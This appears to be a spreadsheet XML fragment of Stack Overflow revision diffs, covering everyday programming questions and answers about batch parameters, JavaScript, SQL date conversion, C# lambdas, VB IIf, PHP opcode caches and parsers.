&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Since the "-" is optional, you don't need to include it. I am not sure what you was using the {4} at the end for? This will find the matches based on what you want, then using the MatchCollection you can access each match to rebuild the string.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dale Ragan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I needed to pass id and password to a cmd (or bat) file at the time of running rather than hardcoding them into the file.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's what the command line looks like:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;test.cmd admin P@55w0rd &amp;gt; test-log.txt_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I needed to pass id and password to a cmd (or bat) file at the time of running rather than hardcoding them into the file.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's&lt;span class="diff-add"&gt; how I do it.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;@echo off_x000D_
fake-command /u %1 /p %2_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Here's&lt;/span&gt; what the command line looks like:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;test.cmd admin P@55w0rd &amp;gt; test-log.txt_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; The %1 applies to the first parameter the %2 (and here's the tricky part) applies to the second. You can have up to 9 parameters passed in this way.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Afterward: This is my first attempt to answer my own question which, to hear Jeff discuss it is a "...perfectly acceptable...." way of using SO. I'm just not certain if there's already a format for doing it.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Keng</t>
  </si>
  <si>
    <t>saluce</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What's the best way of checking if an object property in &lt;em&gt;&lt;strong&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;JavaScript&lt;/span&gt;&lt;/code&gt;&lt;/strong&gt;&lt;/em&gt; is &lt;em&gt;&lt;strong&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;undefined&lt;/span&gt;&lt;/code&gt;&lt;/strong&gt;&lt;/em&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What's the best way of checking if an object property in &lt;span class="diff-add"&gt;JavaScript&lt;/span&gt; is &lt;span class="diff-add"&gt;undefined&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ry- â™¦</t>
  </si>
  <si>
    <t>Jai</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've deployed some Managed Beans on WebSphere 6.1 and I've managed to invoke them through a standalone client, but when I try to use the application "jconsole" distributed with the standard JDK can can't make it works.&lt;/p&gt; _x000D_
 &lt;p&gt; Has anyone achieved to connect the jconsole with WAS 6.1?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've deployed some Managed Beans on WebSphere 6.1 and I've managed to invoke them through a standalone client, but when I try to use the application "jconsole" distributed with the standard JDK can can't make it works.&lt;/p&gt; _x000D_
 &lt;p&gt; Has anyone achieved to connect the jconsole with WAS 6.1?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Edit: IBM WebSphere 6.1 it's supossed to support JSR 160 JavaTM Management Extensions (JMX) Remote API. Furthermore, it uses the MX4J implementation (&lt;/span&gt;&lt;a href="http://mx4j.sourceforge.net" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://mx4j.sourceforge.net&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt;). But I can't make it works with neither "jconsole" nor "MC4J".&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I have the Classpath and the JAVA_HOME correctly setted, so the issue it's not there.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Alotor</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Does JavaScript need access to cookies if AJAX is used?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Does JavaScript need access to cookies if AJAX is used?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Edit:&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; I'm sorry, I guess a lot of people don't understand the question, as evidenced by the edit to my question &amp;amp; the answers. Microsoft created a way to prevent XSS attacks by disallowing JavaScript access to cookies if Http-Only is specified. FireFox later adopted this. So my question is: If you are using AJAX on a site, like StackOverflow, are Http-Only cookies an option?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Polsonby</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a large table with 1 million+ records. Unfortunately, the person who created the table decided to put dates in a varchar(50) field.&lt;/p&gt; _x000D_
 &lt;p&gt; I need to do a simple date comparison -&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;datediff(dd, &lt;span class="hljs-keyword"&gt;convert&lt;/span&gt;(datetime, lastUpdate, &lt;span class="hljs-number"&gt;100&lt;/span&gt;), getDate()) &lt;span class="hljs-operator"&gt;&amp;lt;&lt;/span&gt; &lt;span class="hljs-number"&gt;31&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; But it fails on the convert():&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;Conversion failed &lt;span class="hljs-keyword"&gt;when&lt;/span&gt; converting datetime &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; &lt;span class="hljs-type"&gt;character&lt;/span&gt; string._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Apparently there is something in that field it doesn't like, and since there are so many records, I can't tell just by looking at it. How can I properly sanitize the entire date field so it does not fail on the convert()? Here is what I have now:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-built_in"&gt;count&lt;/span&gt;(&lt;span class="hljs-operator"&gt;*&lt;/span&gt;)_x000D_
&lt;span class="hljs-keyword"&gt;from&lt;/span&gt; MyTable_x000D_
&lt;span class="hljs-keyword"&gt;where&lt;/span&gt;_x000D_
    isdate(lastUpdate) &lt;span class="hljs-operator"&gt;&amp;gt;&lt;/span&gt; &lt;span class="hljs-number"&gt;0&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;and&lt;/span&gt; datediff(dd, &lt;span class="hljs-keyword"&gt;convert&lt;/span&gt;(datetime, lastUpdate, &lt;span class="hljs-number"&gt;100&lt;/span&gt;), getDate()) &lt;span class="hljs-operator"&gt;&amp;lt;&lt;/span&gt; &lt;span class="hljs-number"&gt;31&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/28110/ms-sql-datetime-conversion-failure#28186"&gt;&lt;span class="diff-delete"&gt;@SQLMenace&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; isdate(&lt;span class="hljs-string"&gt;'20080131'&lt;/span&gt;) &lt;span class="hljs-comment"&gt;-- returns 1&lt;/span&gt;_x000D_
&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; isdate(&lt;span class="hljs-string"&gt;'01312008'&lt;/span&gt;) &lt;span class="hljs-comment"&gt;-- returns 0&lt;/span&gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a large table with 1 million+ records. Unfortunately, the person who created the table decided to put dates in a varchar(50) field.&lt;/p&gt; _x000D_
 &lt;p&gt; I need to do a simple date comparison -&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;datediff(dd, &lt;span class="hljs-keyword"&gt;convert&lt;/span&gt;(datetime, lastUpdate, &lt;span class="hljs-number"&gt;100&lt;/span&gt;), getDate()) &lt;span class="hljs-operator"&gt;&amp;lt;&lt;/span&gt; &lt;span class="hljs-number"&gt;31&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; But it fails on the convert():&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;Conversion failed &lt;span class="hljs-keyword"&gt;when&lt;/span&gt; converting datetime &lt;span class="hljs-keyword"&gt;from&lt;/span&gt; &lt;span class="hljs-type"&gt;character&lt;/span&gt; string._x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Apparently there is something in that field it doesn't like, and since there are so many records, I can't tell just by looking at it. How can I properly sanitize the entire date field so it does not fail on the convert()? Here is what I have now:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sql s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;select&lt;/span&gt; &lt;span class="hljs-built_in"&gt;count&lt;/span&gt;(&lt;span class="hljs-operator"&gt;*&lt;/span&gt;)_x000D_
&lt;span class="hljs-keyword"&gt;from&lt;/span&gt; MyTable_x000D_
&lt;span class="hljs-keyword"&gt;where&lt;/span&gt;_x000D_
    isdate(lastUpdate) &lt;span class="hljs-operator"&gt;&amp;gt;&lt;/span&gt; &lt;span class="hljs-number"&gt;0&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;and&lt;/span&gt; datediff(dd, &lt;span class="hljs-keyword"&gt;convert&lt;/span&gt;(datetime, lastUpdate, &lt;span class="hljs-number"&gt;100&lt;/span&gt;), getDate()) &lt;span class="hljs-operator"&gt;&amp;lt;&lt;/span&gt; &lt;span class="hljs-number"&gt;31&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Gumbo</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; OK, this kind of follows on from &lt;a href="http://stackoverflow.com/questions/27758/notify-developer-of-a-do-not-use-method"&gt;my previous question&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; What I would really like to do is create some sort of attribute which allows me to decorate a method that will &lt;strong&gt;break the build&lt;/strong&gt;. Much like the &lt;em&gt;Obsolete("reason", true)&lt;/em&gt; attribute, but without falsely identifying obsolete code.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;To clarify&lt;/strong&gt;: I dont want it to break the build on &lt;em&gt;ANY&lt;/em&gt; &lt;span class="diff-delete"&gt;F5&lt;/span&gt; press, I only want it to break the build if a method decorated with the attribute is called somewhere else in the code. Like I said, &lt;em&gt;similar&lt;/em&gt; to obsolete, but not the same.&lt;/p&gt; _x000D_
 &lt;p&gt; I know I am not alone in this, since &lt;a href="http://stackoverflow.com/questions/27758/notify-developer-of-a-do-not-use-method#27796"&gt;other users want to use it for other reasons&lt;/a&gt;. I have never created custom attributes before so it is all new to me!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; OK, this kind of follows on from &lt;a href="http://stackoverflow.com/questions/27758/notify-developer-of-a-do-not-use-method"&gt;my previous question&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; What I would really like to do is create some sort of attribute which allows me to decorate a method that will &lt;strong&gt;break the build&lt;/strong&gt;. Much like the &lt;em&gt;Obsolete("reason", true)&lt;/em&gt; attribute, but without falsely identifying obsolete code.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;To clarify&lt;/strong&gt;: I dont want it to break the build on &lt;em&gt;ANY&lt;/em&gt; &lt;span class="diff-add"&gt;F6 (Build)&lt;/span&gt; press, I only want it to break the build if a method decorated with the attribute is called somewhere else in the code. Like I said, &lt;em&gt;similar&lt;/em&gt; to obsolete, but not the same.&lt;/p&gt; _x000D_
 &lt;p&gt; I know I am not alone in this, since &lt;a href="http://stackoverflow.com/questions/27758/notify-developer-of-a-do-not-use-method#27796"&gt;other users want to use it for other reasons&lt;/a&gt;. I have never created custom attributes before so it is all new to me!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Rob Cooper</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;The new texnusonfvoin oindofindfot&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;IIf() runs both the true and false code. For simple things like numeric assignment, this isn't a big deal. But for code that requires any sort of processing, you're wasting cycles running the condition that doesn't match, and possibly causing side effects.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Code illustration:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;Module Module1_x000D_
    Sub Main()_x000D_
        Dim test As Boolean = False_x000D_
        Dim result As String = IIf(test, Foo(), Bar())_x000D_
    End Sub_x000D_
_x000D_
    Public Function Foo() As String_x000D_
        Console.WriteLine("Foo!")_x000D_
        Return "Foo"_x000D_
    End Function_x000D_
_x000D_
    Public Function Bar() As String_x000D_
        Console.WriteLine("Bar!")_x000D_
        Return "Bar"_x000D_
    End Function_x000D_
End Module_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Outputs:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;Foo!_x000D_
Bar!_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Tom Mayfield</t>
  </si>
  <si>
    <t>user2359967</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Read all the answers but I think &lt;strong&gt;lambdas and type inferrence&lt;/strong&gt; is underrated.&lt;/p&gt; _x000D_
 &lt;p&gt; Havn't seen anyone mentioned that &lt;strong&gt;Lambdas can have multiple statement&lt;/strong&gt; and they &lt;strong&gt;double as a compatible delegate object&lt;/strong&gt; automatically (just make sure the signature match) as in:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;Console.CancelKeyPress +=_x000D_
    (sender, e) =&amp;gt; {_x000D_
        Console.WriteLine(&lt;span class="hljs-string"&gt;"CTRL+C detected!\n"&lt;/span&gt;);_x000D_
        e.Cancel = &lt;span class="hljs-literal"&gt;true&lt;/span&gt;;_x000D_
    };_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note that I don't have a &lt;code&gt;new CancellationEventHandler&lt;/code&gt; nor do I have to specify types of sender and e, they're inferrable from the event. Which is why this is less cumbersome to writing the whole &lt;code&gt;delegate (blah blah)&lt;/code&gt; which also requires you to specify types of parameters.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Lambdas &lt;span class="diff-delete"&gt;don't&lt;/span&gt; need to return anything&lt;/strong&gt; and type inference is extremely powerful in context like this.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;And&lt;/span&gt; BTW, you can always return &lt;strong&gt;Lambdas that make Lambdas&lt;/strong&gt; in the functional programming sense. For example, here's a lambda that make a lambda that handles a Button.Click event:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;Func&amp;lt;&lt;span class="hljs-built_in"&gt;int&lt;/span&gt;, &lt;span class="hljs-built_in"&gt;int&lt;/span&gt;, EventHandler&amp;gt; makeHandler =_x000D_
    (dx, dy) =&amp;gt; (sender, e) =&amp;gt; {_x000D_
        &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; btn = (sender &lt;span class="hljs-keyword"&gt;as&lt;/span&gt; Button);_x000D_
        btn.Top += dy;_x000D_
        btn.Left += dx;_x000D_
    };_x000D_
_x000D_
btnUp.Click += makeHandler(&lt;span class="hljs-number"&gt;0&lt;/span&gt;, &lt;span class="hljs-number"&gt;-1&lt;/span&gt;);_x000D_
btnDown.Click += makeHandler(&lt;span class="hljs-number"&gt;0&lt;/span&gt;, &lt;span class="hljs-number"&gt;1&lt;/span&gt;);_x000D_
btnLeft.Click += makeHandler(&lt;span class="hljs-number"&gt;-1&lt;/span&gt;, &lt;span class="hljs-number"&gt;0&lt;/span&gt;);_x000D_
btnRight.Click += makeHandler(&lt;span class="hljs-number"&gt;1&lt;/span&gt;, &lt;span class="hljs-number"&gt;0&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note the chaining: &lt;code&gt;(dx, dy) =&amp;gt; (sender, e) =&amp;gt;&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Now that's why I'm happy to have taken the functional programming class :-)&lt;/p&gt; _x000D_
 &lt;p&gt; Other than the pointers in C, I think &lt;span class="diff-delete"&gt;it's&lt;/span&gt; the other fundamental thing you should learn :-)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Read all the answers but I think &lt;strong&gt;lambdas and type inferrence&lt;/strong&gt; is underrated.&lt;/p&gt; _x000D_
 &lt;p&gt; Havn't seen anyone mentioned that &lt;strong&gt;Lambdas can have multiple statement&lt;/strong&gt; and they &lt;strong&gt;double as a compatible delegate object&lt;/strong&gt; automatically (just make sure the signature match) as in:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;Console.CancelKeyPress +=_x000D_
    (sender, e) =&amp;gt; {_x000D_
        Console.WriteLine(&lt;span class="hljs-string"&gt;"CTRL+C detected!\n"&lt;/span&gt;);_x000D_
        e.Cancel = &lt;span class="hljs-literal"&gt;true&lt;/span&gt;;_x000D_
    };_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note that I don't have a &lt;code&gt;new CancellationEventHandler&lt;/code&gt; nor do I have to specify types of sender and e, they're inferrable from the event. Which is why this is less cumbersome to writing the whole &lt;code&gt;delegate (blah blah)&lt;/code&gt; which also requires you to specify types of parameters.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Lambdas &lt;span class="diff-add"&gt;doesn't&lt;/span&gt; need to return anything&lt;/strong&gt; and type inference is extremely powerful in context like this.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;and&lt;/span&gt; BTW, you can always return &lt;strong&gt;Lambdas that make Lambdas&lt;/strong&gt; in the functional programming sense. For example, here's a lambda that make a lambda that handles a Button.Click event:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;Func&amp;lt;&lt;span class="hljs-built_in"&gt;int&lt;/span&gt;, &lt;span class="hljs-built_in"&gt;int&lt;/span&gt;, EventHandler&amp;gt; makeHandler =_x000D_
    (dx, dy) =&amp;gt; (sender, e) =&amp;gt; {_x000D_
        &lt;span class="hljs-keyword"&gt;var&lt;/span&gt; btn = (sender &lt;span class="hljs-keyword"&gt;as&lt;/span&gt; Button);_x000D_
        btn.Top += dy;_x000D_
        btn.Left += dx;_x000D_
    };_x000D_
_x000D_
btnUp.Click += makeHandler(&lt;span class="hljs-number"&gt;0&lt;/span&gt;, &lt;span class="hljs-number"&gt;-1&lt;/span&gt;);_x000D_
btnDown.Click += makeHandler(&lt;span class="hljs-number"&gt;0&lt;/span&gt;, &lt;span class="hljs-number"&gt;1&lt;/span&gt;);_x000D_
btnLeft.Click += makeHandler(&lt;span class="hljs-number"&gt;-1&lt;/span&gt;, &lt;span class="hljs-number"&gt;0&lt;/span&gt;);_x000D_
btnRight.Click += makeHandler(&lt;span class="hljs-number"&gt;1&lt;/span&gt;, &lt;span class="hljs-number"&gt;0&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note the chaining: &lt;code&gt;(dx, dy) =&amp;gt; (sender, e) =&amp;gt;&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Now that's why I'm happy to have taken the functional programming class :-)&lt;/p&gt; _x000D_
 &lt;p&gt; Other than the pointers in C, I think &lt;span class="diff-add"&gt;its&lt;/span&gt; the other fundamental thing you should learn :-)&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;EDIT:&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; Man this is awesome! A lot of things I've never knew before haha, I'd definitely favorites this if I can.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>chakrit</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have run several &lt;a href="http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/" rel="nofollow noreferrer"&gt;benchmarks with eAcclerator, APC, XCache&lt;/a&gt; and (even though it is a optimizer, not a cache) Zend Optimizer&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;img class="diff-delete" src="https://i.stack.imgur.com/8BCtu.png" alt="Benchmark Results"&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Result: eAccelerator is fastest (in all tests), followed by XCache and APC. (The one in the diagram is the number of seconds to call a WordPress home page 10,000 times).&lt;/p&gt; _x000D_
 &lt;p&gt; Zend Optimizer made everything slower (!).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have run several &lt;a href="http://blogs.interdose.com/dominik/2008/04/11/benchmarking-php-eaccelerator-und-andere-opcode-caches/" rel="nofollow noreferrer"&gt;benchmarks with eAcclerator, APC, XCache&lt;/a&gt; and (even though it is a optimizer, not a cache) Zend Optimizer&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://blogs.interdose.com/dominik/wp-content/uploads/2008/04/opcode_wordpress.png" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Benchmark Results http://blogs.interdose.com/dominik/wp-content/uploads/2008/04/opcode_wordpress.png&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Result: eAccelerator is fastest (in all tests), followed by XCache and APC. (The one in the diagram is the number of seconds to call a WordPress home page 10,000 times).&lt;/p&gt; _x000D_
 &lt;p&gt; Zend Optimizer made everything slower (!).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The hard way:&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; You may want a &lt;a href="http://en.wikipedia.org/wiki/Recursive_descent_parser" rel="nofollow noreferrer"&gt;recursive decent parser&lt;/a&gt;.&lt;span class="diff-delete"&gt; To&lt;/span&gt; get precedence you need to think recursively, for example, using your sample string,&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;1+11*5_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; to do this manually, you would have to read the 1, then see the plus and start a whole new recursive parse "session" starting with 11... and make sure to parse the &lt;code&gt;&lt;span class="diff-delete"&gt;11 * 5&lt;/span&gt;&lt;/code&gt; into its own factor, yielding a parse tree with &lt;code&gt;&lt;span class="diff-delete"&gt;1 + (11 * 5)&lt;/span&gt;&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; This all feels so painful even to attempt to explain, especially with the added powerlessness of C. See, after parsing the 11, if the * was actually a + instead, you would have to abandon the attempt at making a term and instead parse the 11 itself as a factor. My head is already exploding. It's possible with the recursive decent strategy, but there is a better way...&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The easy (right) way&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; If you use a GPL tool like Bison, you probably don't need to worry about licensing issues since the C code generated by bison is not covered by the GPL (IANAL but I'm pretty sure GPL tools don't force the GPL on generated code/binaries; for example Apple compiles code like say, Aperture with GCC and they sell it without having to GPL said code).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.gnu.org/software/bison/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Download Bison (or something equivalent, ANTLR, etc&lt;/span&gt;.&lt;span class="diff-delete"&gt;)&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; There is usually some sample code that you can just run bison on and get your desired C code that demonstrates &lt;a href="http://www.gnu.org/software/bison/manual/html_mono/bison.html#Infix-Calc" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;this four function calculator&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Look at the generated code, and see that this is not as easy as it sounds. Also, the advantages of using a tool like Bison are 1) you learn something (especially if you read the Dragon book and learn about grammars), 2) you avoid &lt;a href="http://en.wikipedia.org/wiki/Not_Invented_Here" rel="nofollow noreferrer"&gt;NIH&lt;/a&gt; trying to reinvent the wheel. With a real parser-generator tool, you actually have a hope at scaling up later, showing other people you know that parsers are the domain of parsing tools.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; People here have offered much sound advice. My only warning against skipping the parsing tools or just using the Shunting Yard algorithm or a hand rolled recursive decent parser is that little toy &lt;span class="diff-delete"&gt;languages(1)&lt;/span&gt; may someday turn into big actual languages with functions (sin, cos, log) and variables, conditions and for loops.&lt;/p&gt; _x000D_
 &lt;p&gt; Flex/Bison may very well be overkill for a small, simple interpreter, but a one off parser+evaluator may cause trouble down the line when changes need to be made or features need to be added. Your situation will vary and you will need to use your judgement; just don't &lt;a href="http://torque.realinfo.de/index.php?title=Torque_Scripting_Language" rel="nofollow noreferrer"&gt;punish other people for your sins&lt;/a&gt;&lt;span class="diff-delete"&gt;(2)&lt;/span&gt; and build a less than adequate tool.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;My favorite tool for parsing&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; The best tool in the world for the job is the &lt;a href="http://book.realworldhaskell.org/read/using-parsec.html" rel="nofollow noreferrer"&gt;Parsec&lt;/a&gt; library (for recursive decent parsers) which comes with the programming language Haskell. It looks a lot like &lt;a href="http://en.wikipedia.org/wiki/Backus%E2%80%93Naur_form" rel="nofollow noreferrer"&gt;BNF&lt;/a&gt;, or like some specialized tool or domain specific language for parsing (sample code &lt;span class="diff-delete"&gt;(3)&lt;/span&gt;), but it is in fact just a regular library in Haskell, meaning that it compiles in the same build step as the rest of your Haskell code, and you can write arbitrary Haskell code and call that within your parser, and you can mix and match other libraries &lt;em&gt;all in the same code&lt;/em&gt;. (Embedding a parsing language like this in a language other than Haskell results in loads of syntactic cruft, by the way. I did this in C# and it works quite well but it is not so pretty and succinct.)&lt;/p&gt; _x000D_
